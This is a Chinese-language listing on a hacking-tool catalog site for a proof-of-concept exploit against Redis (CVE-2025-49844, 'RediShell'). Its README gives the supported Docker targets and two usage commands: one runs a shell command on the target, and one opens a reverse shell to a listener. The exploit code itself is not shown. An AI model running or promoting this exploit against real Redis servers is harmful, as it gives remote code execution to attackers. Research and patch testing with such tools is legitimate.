Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2025-49844 — CVE-2025-49844 的概念验证 | Kitploit
工具/GitHubGitHub/saneki/cve-2025-49844
漏洞分析漏洞利用渗透测试命令与控制红队远程访问工具
GitHubsaneki/cve-2025-49844

cve-2025-49844

CVE-2025-49844 的概念验证

查看仓库
2569个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-49844

這是本人針對 CVE-2025-49844(又稱 RediShell)的個人概念驗證。

支援的目標建置版本:

  • x86-64 Linux redis:8.2.1-alpine Docker 映像
  • x86-64 Linux redis:8.2.1-bookworm Docker 映像

它有點笨拙,可能不如 Wiz Research 的那麼好。不過,我很高興能在 Hexacon 2025 演講影片上傳前讓它運作起來,而且調查過程讓我獲益良多。

使用方法

執行單向 shell 指令:

root@kitploit:~
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"

連線反向 shell:

root@kitploit:~
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444
下载工具